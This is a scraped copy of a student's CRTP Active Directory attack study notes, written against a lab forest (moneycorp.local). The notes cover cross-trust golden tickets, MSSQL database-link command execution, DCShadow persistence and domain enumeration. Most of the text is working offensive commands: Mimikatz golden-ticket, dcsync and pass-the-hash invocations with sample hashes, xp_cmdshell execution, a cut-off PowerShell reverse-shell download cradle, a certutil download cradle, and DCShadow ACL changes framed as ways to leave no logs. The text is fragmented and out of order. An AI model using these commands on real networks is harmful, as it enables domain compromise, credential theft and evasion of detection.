Other option we have,we can use the same things with krbtgt hash of our
current domain:
if some one get the krbtgt key they can fall back the trust key and Verica verses
🔴 Here we get the TGT whatever TGS is requested would be automatically requesting using
this TGT.
# We will abuse SID history once again

#OR
# Now Create a Inter-realm TGT;

Invoke-Mimikatz -Command '"kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-
5-21-280534878-1496970234-700767426-519
/krbtgt:ff46a9d8bd66c6efd77603da26796f35
/ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
So Now Create a Inter-realm TGT;
gwmi -Class win32_operatingsystem -ComputerName mcorp-dc
💥 Very Interesting :
Avoid suspicious logs:
Invoke-Mimikatz -Command '"kerberos::golden /user:dcorp-dc$

/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-
3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-
1496970234-700767426-516,S-1-5-9
/krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'
# dump NTLM hash of mcorp/administrator

Invoke-Mimikatz -Command '"lsadump::dcsync
/user:mcorp\Administrator /domain:moneycorp.local"'
S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers
S-1-5-9 – Enterprise Domain Controllers
Cross Forest Attack ( External Trust )

if i recall current Domain Like ( DollarCorp ) has External Bidirectional Trusts with a
Forest For example Called ( EuroCorp ).
If We have access to trust key we can forge an inter-realm TGT for they External Trust .
The Difference:
We Could Escalate our Privelige to the Enterprise Admin By Using ( SID History )
# Trust key for the inter-forest trust:

Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# OR
# Foregd Inter-Forest TGT

Invoke-Mimikatz -Command '"Kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-1874506631-3219952063-538504511
/rc4:<KEY_OF_TRUST_FOREST> /service:krbtgt
/target:eurocorp.local
/ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'
# Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket.
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local
#Tickets for other services (like HOST and RPCSS for WMI, HOST and
#HTTP for PowerShell Remoting and WinRM) can be created as well.
# Inject The TGS

# Use the TGS to access the targeted service
.\kirbikator.exe lsa .\CIFS.eurocorpdc.eurocorp.local.kirbi
ls \\eurocorp-dc.eurocorp.local\forestshare\
# Note We can access juts with Resource are shared with us
Because it’s not shared with us .
Interest Part Here:

we can get our Domain Admin privileges in other forest .
Trust Abuse - MSSQL Servers
MSSQL Server are generally deployed in plenty in a windows domain.
SQL servers provide a very good options for Lateral movement as domain Users can be
mapped to database roles .
Lets user PowerUpSQL
# Discovery ( SPN Scanning ) -> This Get All Things has a MSSQL keywords
Get-SQLInstanceDomain
# Check Accessibility -> This one will be check wich Server We Can to Accessible.
Get-SQLConnectionTestThreaded
# OR
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
# Gather Information For SQL server

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLInstanceDomain
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose → Access Only Those SQL service Which Are
accessible on the Network :
Ease Way Check What are our Privileges on The sql Server:
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Database Links:
A database Link allows a SQL server to access external Data sources like Other SQL
servers and OLE DB data Sources.
In case of database links between SQL servers, that is, linked SQL servers
it is possible to execute stored procedures.
Database links work even across forest trusts.
# Searching Database Links

# * Look for links to remote server
Get-SQLServerLink -Instance dcorp-mssql -Verbose
# OR Manually
select * from master..sysservers # -> Run this command by using Hidisql
Links to Another Database Called → DCROP-SQL1
DatabaseLinkLocation → Remote
Manullay Using HidiSQL APP
We Have A Database Links → DCORP-SQL1
Enumerate Database Links - Manually
Openquery() Function can be use to run queries on a linked database:
select * from openquery(”NAME_DB_LINK”,’COMMAND’)
select * from openquery(”DCORP-SQL1”, ' select * from sysservers ' )
‫ﺗﺮا ﻣﺮه ﻣﻬﻢ اﻟﺴﻨﻘﻞ ﻛﻮت ﻳﻌﻨﻲ ﻟﻮ ﻋﻨﺪك اﻛﺜﺮ ﻣﻦ ﻟﻨﻚ ف ﻳﺼﻴﺮ ﻛﻞ ﻛﻮﻳﺮي ﻧﺰود ﻋﺪد اﻟﺴﻨﻘﻞ ﻛﻮد‬
Keep Jumping onto different Links Manually
select * from openquery(”DCORP-SQL1”,’select * openquery("DCORP-MGMT", '' select * from master..sysservers '' )’) →
and so on .
# Enumerateing Database Links -> PowerUpSQL

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
Executing Command ( xp_cmdshell )
On the target server, either xp_cmdshell should be enabled
if rpcout is enabled ( disabled by default ) , xp_cmdshell can be enabled using :

EXECUTE(’sp_configure “xp_cmdshell”,1,reconfigure;’) AT “eu-sql”
# Execute Command
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | ft <- FormatTable
# Manually
select * from openquery("dcorp-sql1",'select * from openquery("dcorpmgmt",''select * from openquery("eu-sql.eu.eurocorp.local"
@@version as version;exec master..xp_cmdshell "powershell
whoami)'''')'')')
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | ft
We can execute command across Forest trust just by using Database Links.
So, How Get A Reverse Shell on the EU-SQL server ?
Get-SQLServerLinkCrawl -Instance dcorp-mssql.domain.forest.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object
Forest Persistence - DCShadow
it’s register temporarily a new Domain Controller on the target domain , and uses it to
“push” attributes Like:
SIDHistory
SPNs
on specified objects ( Without leaving the change logs for modified object )
So, There are no ( 4662 ID Directly service access logs ).
How New Domain Controller Register?

The New DC registred By Modifying Multible objects For Example:
Configuration Container.
SPNs for computer objects from where the attacks executed.
Couple of RPC services.
Because the attributes are changed from a “ Domain Controlled “ , there

are no Directory Changes logs on the actual DC for the target object .
By Default Domain Admin Privileges are Required to use DCShadow
It’s Possible execute DCShadow Without DA
The attacker’s machine must be part of the Forest Root Domain ( able to successfully DCShadow )
💥 Attacking:
We need Two Instances Mimikatz:
1. start RPC server With System Privileges and specify the object and attributes to be
modified in this instance.
a. lsadump::dcshadow /object:<userName> /attribute:Description /value="Hello From DCShadow"
2. Enough Privileges ( DA or Otherwise ) By default DA privileges, to pushes the value .
a. lsadump::dcshadow /push
Demo:
Start Mimikatz And should Running it with SYSTEM privileges.
For this lab, two shells are required
1. one running with SYSTEM privileges
2. with privileges of a domain member that is in Domain admin group
# Load the driver in mimikatz:

!+
!processtoken
# Check the system Privileges:
token::whoami
Now run This command to change the value of the Attribute for a specific user:
lsadump::dcshadow /object:root13user /attribute:Description /value="Hello From DCShadow"
How we got a DA Here ?
When We Escalate our Privileges from DA to EA using the krbtgt of DollarCorp we can get the
hashes of Administrator of moneycorp.local
sekurlsa::pth /user:Administrator /domian:moneycorp.local /ntlm:<HASH_OF_ADMINISTRATOR> /impersonate
Now Run the command lsadump::dcshadow /push With Domain Admin And push the Attribute:
In DCShadow attacks → There is no change logges on the target object.
DCShadow Minimal Permissions:

DCShadow can be used with minimal permissions by modifiying ACLs Of :
The Domain Object
DS-Install-Replica ( ADD/Remove Replica in Domain )
DS-Replicataion-Manage-Topology ( Manage Replication Topology )
DS-Replication-Synchronize ( Replication Synchronization )
The sites object ( and it’s children ) in the Configuration Container
CreateChild and DeleteChild
The object of the Computer which is registred as a DC
WriteProperty ( Not Write )
The target object
WriteProperty ( Not Write )
on the Domain Object:
What the permissions are required:
ADD/Remove Replica in Domain
Manage Replication Topology
Replication Synchronization
On the site Container:
CreateChild
DeleteChild
We can set all of these manually.

OR
We Can use Set-DCShadowPermissions From Nishang for setting the

permissions.
With Domain Admin Privileges We can modifiy any object from any machine as domain admin
But if we use Minimal Permission then the scope much restricted
For Example, to use DCShadow as user student1 to modify root1user object from machine mcorp-
student1
Set-DCShadowPermissions -FakeDC **mcorp-student1** -SAMAccountName **root1user** -Username **student1** -Verbose
We Must log in mcorp-student1 as student1 So, We can modifiy root1user
The second Mimikatz instance ( which runs as DA ) is not Required
We Need DA on the mcorp.local
Now After That run mimikatz and run the DCShadow Module as we do it before:
lsadump::dcshadow /object:root13user /attribute:Description /value="Hello DCShadow Without DA"
Now Run Second Mimikatz with our privileges:
Once We have permission sorted out , so much of interestign stuff can
be done.
For Example , set SIDHistory of a user Account to EA or DA group:
lsadump::dcshadow /object:<user> /attribute:SIDHistory /value:SID-519 -> EA

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:SID-519 -> EA
# To use Above without DA

Set-DCShadowPermissions -FakeDc mcorp-student1 -SAMAccountname root1user -Username student1 -Verbose
Set primaryGroupID of user account to EA or DA group:
lsadump::dcshadow /object:<user> /attribute:primaryGroupID /value:519 -> EA
We Can modify ntSecurityDescriptor for AdminSDHolder to add Full Control of a user
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local")).psbase.ObjectSecuri
We just need to append a Full control ACE from above for SY/BA/DA with our user’s SID at the
end .
SY → System
BA → Built-in Administrator
DA → Domain Admin
💡 We want to retrieve the current ACL of The AdminSDHolder
Now what we want to do?
This is for Built-in Administrator so we will copy and replace BA with Our sid of user.
Similarly with the SY and DA.
And Replace BA with our own SID
Now it’s time for DCShadow 🙂
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<LIKE-Figure>
Now With Second Mimikatz with DA privilegs:
Now Let’s check our Permission :
We have Exact same permission As built-in Administrator
Very Interesting Thing ⬇
We Can run DCShadow From DCShadow ( Shadowception )
That without leaving logs 😉
Before we Mentioned the Set-DCShadowPermissions with minimal permissions but there is a
problem
( leaves logs when we changed the ACL for Domain object or Site object )
So How Do we avoid leaving that logs?

if we set that permission By using ShadowCeption 😛
We need to append following ACEs with out user’s SID at the end :
On the Domain Object :
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;; UserSID )
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;; UserSID )
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;; UserSID )
On the Attacker Computer object
(A;;WP;;;UserSID) , WP →WriteProbirty
On the target user object
(A;;WP;;;UserSID)
On the sites object in Configuration Container
(A;Cl;CCDC;;;UserSID) , CCDC →Create Child , Delete Child.
# Read the current ACL of the domain Controller:

(New-ObjectSystem.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl
This is ACL for Domain Controller .
On the Mimikatz:
lsadump::dcshadow /stack /object:DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<ACL_FOR_DC>
In the < AC_FOR_DC > we Add our User SID in Domain Object Like this
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;; UserSID )
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;; UserSID )
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;; UserSID )
And now Get the ACL for Attacker machine in our example student13
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=mcorp-student13,CN=Computers,DC=moneycorp,DC=local")).psbase.Ob
lsadump::dcshadow /stack /object:mcorp-<UserName>$ /attribute:ntSecurityDescriptor /value:<ACL_FOR_Attacker>

lsadump::dcshadow /stack /object:mcorp-student13$ /attribute:ntSecurityDescriptor /value:<ACL_FOR_Attacker>
In the < ACL_FOR_Attacker > we Add our User SID in Domain Object
Like this
(A;;WP;;;UserSID)
And now Get the ACL for Target user in our example root13user
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=root13user,CN=Computers,DC=moneycorp,DC=local")).psbase.ObjectS
lsadump:dcshadow /object:<targetUser> /attribute:ntSecurityDescriptor /value:<ACL_FOR_TargetUser>
In the < ACL_FOR_Target > we Add our User SID in Domain Object Like
this
(A;;WP;;;UserSID)
Finally Get ACL for Sites Object Configuration Container: (A;CI;CCDC;;;UserSID)
(New-Object System.DirectoryServices.DirectoryEntry("CN=Sites,CN=Configuration,DC=moneycorp,DC=local")).psbase.ObjectSecurity.
lsadump:dcshadow /object:CN=Sites,CN=Configuration,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<ACL_FOR_Sites
And Now push it .
# First Mimikatz
lsadump:dcshadow
# Second Mimikatz With DA
lsadump::dcshadow /push
Done 😋.

CRTP Notes Meshari Almalki

Uploaded by

Copyright:

Available Formats

CRTP Notes Meshari Almalki

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CRTP Notes Meshari Almalki

Uploaded by

Copyright:

Available Formats

CRTP-Notes-Meshari-Almalki

💡 Meshari-Almalki Enjoy ❤ Twitter: @slv0d Linkedin:@meshari-almalki

Get-Process → Get All process on Machine

powershell -ep bypass

powershell -encodedcommand $env:PSExecutionPolicyPreference=”bypass”

This Import a module .

This list all commands of module.

Get-Command -Module <moduleName>

Download EXC cradle:

certutil.exe -urlcache -f “URL” File_name

AMSI‫ﻗﺒﻞ ﻛﻞ ﺷﻲ ﻻزم اﺳﻮي ﺗﺨﻄﻲ ل‬ ( Antimalware Scan Interface )

1. .NET Class Command to View Domain Name and Other :

Forest → Name of Forest

Parent → Name of Domain

DomainControllers → There is Just one { dcorp-dc }

DomainModeLevel → Windows Server 2016

a. Get-NetDomain → For Domain Enumeration .

b. Get-NetDomain -Domain <Domain_Name> → Get object of another Domain

Get-NetDomainController -Domain <Name_Of_Domain>

Get-ADDomain → Like Get-NetDomain in PowerView.ps1

Get-ADDomain -Identity <Domain_Name> → Get object of another Domain

Get-NetUser -User <UserName> → Get Full Information about Specific User .

Get-UserProperty → Get All Properties for username .

Get-UserProperty -Properties <NameOfProperty>

that’s help for looking some password that forget in description 😉

Get-ADUser -Filter * -Property *

Get-ADUser -Identity <UserName> -Property *

Get-ADUser -Filter ‘Description -like “built”’ -Properties Description | select name

Get-NetComputer → Computer object in Domain ( Not necssary actually Machine in domain

Get-NetComputer -Ping → Which Machine is live or not .

Get-NetComputer -OperatingSystem “*Server 2016*”

Get-ADComputer -Filter * | select Name

Get-ADComputer -Filter ‘OperatingSystem -Like “*Server 2016*”’ -Properties

Get-NetGroup → List all the domain groups

Get-NetGroup -GroupName “*admin*” -Domain <Forest_Root> → to get more group for

Get-ADGroup -Filter * | Get-ADGroup -Filter * | select Name

Group Member Enumeration

Get-NetGroupMember -GroupName “Domain Admins”

Get-NetGroupMember -GroupName "Enterprise Admins"

Get-NetGroupMember -GroupName “Administrators” -Recurse

‫ﺑﻌﺪ ﻣﺎﻧﺴﺘﺨﺪم اﻟﺮﻳﻜﻴﺮس‬

Get-NetGroup -Username "Administrator"

#‫ﻫﺬي اﻟﻘﺮوﺑﺎت اﻟﻠﻲ ﻳﻨﺘﻤﻲ ﻟﻬﺎ اﻟﻴﻮزر ادﻣﻨﺴﺘﺮﻳﺘﻮر‬

Get-NetGroup -UserName "Administrator" -Domain "moneycorp.local"

‫ ﻋﺸﺎن اﻋﺮف اﻧﺎ ﻓﻲ اي ﻗﺮوب‬:

List All groups into a domain controller :

Get-NetLocalGroup -ComputerName <DC> -ListGroups

List Membership of Administrator Group inside DC :

Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local

List Actively Logged users on a computer → Need local admin priv

i’m not a local admin ☹

Get-Loggedonlocal -ComputerName <DC>

Get-LastLoggedOn -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Find shared on host in current Domain

Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC

Get-NetFileServer -Verbose -> Get All fileservers on Domain

Group Policy ( GPO )

3. GPO preferences like startup/shutdown/log-on/logoff - script setting

Get-NetGPO -> Get GPO

Get-NetGPO | select displayname -> Get Just a names of GPO

Get-NetComputer -OperatingSystem “Server 2016”

Get-ADComputer -Filter ‘OperatingSystem -Like “Server 2016”’ -Properties

Get-NetGroup -GroupName “admin” -Domain <Forest_Root> → to get more group for